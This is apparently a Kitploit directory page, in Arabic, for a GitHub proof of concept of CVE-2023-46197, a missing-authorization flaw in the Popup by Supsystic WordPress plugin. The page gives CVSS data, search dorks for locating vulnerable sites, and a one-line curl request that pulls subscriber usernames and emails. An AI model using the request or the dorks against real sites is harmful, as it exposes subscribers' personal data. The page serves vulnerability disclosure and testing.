Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-46197 — Popup by Supsystic <= 1.10.19 - ثغرة في التفويض المفقود تؤدي إلى كشف معلومات حساسة | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2023-46197
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2023-46197

CVE-2023-46197

Popup by Supsystic <= 1.10.19 - ثغرة في التفويض المفقود تؤدي إلى كشف معلومات حساسة

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-46197

Popup by Supsystic <= 1.10.19 - ثغرة في تفويض الوصول تؤدي إلى كشف معلومات حساسة

الوصف

إضافة Popup by Supsystic لووردبريس معرضة لخطر كشف معلومات حساسة في جميع الإصدارات حتى 1.10.19 عبر إجراء getWpCsvList. وهذا يسمح للمهاجمين المُوثَّقين بمستوى وصول المشترك أو أعلى باستخراج بيانات حساسة بما في ذلك عناوين البريد الإلكتروني للمشتركين.

root@kitploit:~
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f458663f-6b1a-4acd-b2db-c66d7a915ab7?source=api-prod
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2023-46197
  metadata:
    fofa-query: "wp-content/plugins/popup-by-supsystic/"
    google-query: inurl:"/wp-content/plugins/popup-by-supsystic/"
    shodan-query: 'vuln:CVE-2023-46197'
    slug: 'popup-by-supsystic'

إثبات المفهوم:

root@kitploit:~
curl "http://wordpress.lan/?mod=subscribe&action=getWpCsvList&pl=pps"

"Username";"Email";"Activated";"PopUp ID";"Date Created"
تنزيل الأداة